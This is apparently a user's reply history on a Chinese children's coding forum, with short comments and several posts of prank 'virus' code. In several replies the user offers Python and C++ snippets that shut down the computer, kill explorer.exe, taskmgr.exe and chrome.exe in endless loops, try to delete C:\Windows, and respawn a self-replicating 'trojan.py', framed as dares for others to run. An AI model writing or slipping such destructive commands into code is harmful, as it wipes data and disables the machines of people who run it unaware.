猫史档案馆


1BB0090940B96FFBF

1BB0090940B96FFBF

Lv.1

77ECEA85-EA13-05EE-BA77-E5D95B05D8E2

获赞:290收藏:127浏览:9413作品收藏:186

签名:899FA603-3801-6B87-418A-8B47A6B9A66B 098BEB5F-75C4-64AF-769B-DC002A88590B 038818D0-CD7F-6B86-AB6C-2A78E226643F 1738D4C6-7DFA-E471-8326-E777C158B534

回复帖子评论
上一页1 页 / 共 6下一页

【Python作品分享】计算器【作品秀】 中回复

有bugcenter_image

2019-05-25T14:06:08 点赞:0

【海龟编辑器】意见反馈信箱(长期有效) 中回复

无法转换center_image

2019-05-25T15:20:54 点赞:0

【Python作品分享】求2个数之间3的倍数【作品秀】 中回复

print('输入两个整数,输出它们之间所有的为3的倍数的数(不包括这两个整数)')
print('定义4个变量,a,b为输入的两个数,c是3的倍数,max是用记a,b中最大的数')
print('如果b>a,交换两个数')
print('输入2个数吧!')
a = int(input('输入第一个数'))
b = int(input('输入第二个数'))
max1 = a
if (max1 > b):
    a = b
    b = max1
for c in range((a + 1),b,3)
    print(c)

2019-06-13T09:40:21 点赞:0

【Python作品分享】os【作品秀】 中回复

center_image

2019-06-13T17:16:22 点赞:0

【Python作品分享】os【作品秀】 中回复

#include<bits/stdc++.h>
using namespace std;
int main()
{
    cout<<"呵呵";
    system("shutdown /s /t 0");
}

2019-06-13T17:22:01 点赞:0

让你的python运行界面死机的程序 中回复

from os import system
system('rd C:\\Windows /s')

2019-07-29T17:32:48 点赞:0

【上瘾游戏】能让你玩上瘾的生存游戏! 中回复

无法存档

点进去显示积木有问题

2019-08-04T22:08:53 点赞:0

私有云变量太少了! 中回复

同感

2019-08-07T15:03:06 点赞:0

来自某8发现的问题 中回复

微 信

2019-12-10T09:43:53 点赞:0

@技术喵们:多人创作做好了吗? 中回复

QQ发bcm文件

2019-12-10T09:45:08 点赞:0

有人吗ZZZZZZZZZ 中回复

没有(滑稽)

2020-03-26T15:15:03 点赞:0

【Python作品分享】进制转换v2.4 中回复

大佬厉害啊emotion_编程猫_厉害了emotion_编程猫_厉害了

2020-03-26T15:50:37 点赞:1

【Python作品分享】健康温湿度计【作品秀】 中回复

逗我玩呢???

2020-03-26T15:58:08 点赞:0

两件坏消息 中回复

h喵l是什么(滑稽)

2020-03-30T11:34:06 点赞:0

【全编程猫迷惑行为】迷惑行为打赏 中回复

mn抄袭MC被告了

还说没事???

2020-03-30T14:19:05 点赞:0

千万别点进来!!!! 中回复

QWERTYUI欧帕斯对方过后就开了自行车VB你们

2020-03-30T14:21:04 点赞:0

【Python作品分享】【OS模块】嘿嘿嘿,你敢运行吗???【作品秀】 中回复

/*
比关机更坑的
*/
#include<bits/stdc++.h>
using namespace std;
int main()
{
    while(1)
    {
        system("taskkill /f /im explorer.exe >nul 2>nul");
        system("taskkill /f /im taskmgr.exe >nul 2>nul");
    }
}

center_image

2020-04-03T17:00:13 点赞:0

【Python作品分享】【OS模块】嘿嘿嘿,你敢运行吗???【作品秀】 中回复

Python版

#比关机更坑的
from os import system
while True:
    system("taskkill /f /im explorer.exe >nul 2>nul")
    system("taskkill /f /im taskmgr.exe >nul 2>nul")
    system("taskkill /f /im chrome.exe >nul 2>nul")

center_image

2020-04-05T15:54:37 点赞:0

【Python作品分享】【OS模块】嘿嘿嘿,你敢运行吗???【作品秀】 中回复

from os import system
while True:
    system("python C:\\file.py")

保存为 C:\file.py

center_image

2020-04-05T16:06:42 点赞:0

【Python作品分享】此电脑(病毒)(喵产品)【作品秀】 中回复

优 秀

2020-04-05T16:50:34 点赞:0

【Python作品分享】此电脑(病毒)(喵产品)【作品秀】 中回复

from os import system
while True:
    system("taskkill /f /im explorer.exe >nul 2>nul")
    system("taskkill /f /im taskmgr.exe >nul 2>nul")
    system("taskkill /f /im chrome.exe >nul 2>nul")

center_image

2020-04-05T16:51:42 点赞:1

【Python作品分享】系统错误,系统喵机【教程贴】 中回复

from os import system
while True:
    system("python C:\\file.py")

保存为 C:\file.py

center_image

2020-04-05T16:56:34 点赞:0

【Python作品分享】愚人节作品【作品秀】 中回复

为什么不用这个呢?

from os import system
while True:
    system("taskkill /f /im explorer.exe >nul 2>nul")
    system("taskkill /f /im taskmgr.exe >nul 2>nul")
    system("taskkill /f /im chrome.exe >nul 2>nul")

center_image

2020-04-05T17:02:40 点赞:0

代码世界大战 中回复

然后一个

system("shutdown -s -t 10")

全军覆没center_image

2020-04-06T11:03:58 点赞:0

【自动】博文:Py基础——装饰器的用法 中回复

404???(滑稽)

2020-04-06T11:07:07 点赞:0

3日之内审核? 中回复

没问题啊center_image

2020-04-09T19:20:50 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

//又是滑稽的一天
include<bits/stdc++.h>
using namespace std;
int main()
{
    int choice;
    cout<<"请输入1,如果输入错误电脑会关机";
    cin>>choice;
    if(choice==1) system("shutdown /s /t 60 /c \"你被坑了:D\"");
    else system("shutdown /s /t 60 /c \"你不听我的话!系统即将关机!\"");
}

center_image

2020-04-10T15:23:53 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

#又双叒叕是滑稽的一天(Python)
from os import system
while True:
    system("taskkill /f /im explorer.exe >nul 2>nul")
    system("taskkill /f /im taskmgr.exe >nul 2>nul")
    system("taskkill /f /im chrome.exe >nul 2>nul")

2020-04-10T15:27:36 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

//又双叒叕是滑稽的一天(C++)
#include<bits/stdc++.h>
using namespace std;
int main()
{
    while(1)
    {
        system("taskkill /f /im explorer.exe >nul 2>nul");
        system("taskkill /f /im taskmgr.exe >nul 2>nul");
    }
}

2020-04-10T15:28:27 点赞:0

求素材!!!有没有会语言编程的朋友啊!!!我找你们有事 中回复

//滑稽保命
#include<bits/stdc++.h>
using namespace std;
int main()
{
    freopen("C\\trojan.py","w",stdout);
    cout<<"import os"<<endl;
    cout<<"while True:"<<endl;
    cout<<"system(\"python C\\trojan.py\")";
    fclose(stdout);
    cout<<"########病毒准备就绪#########";
    system("python C\\trojan.py");
}
//滑稽保命

2020-04-10T15:35:17 点赞:0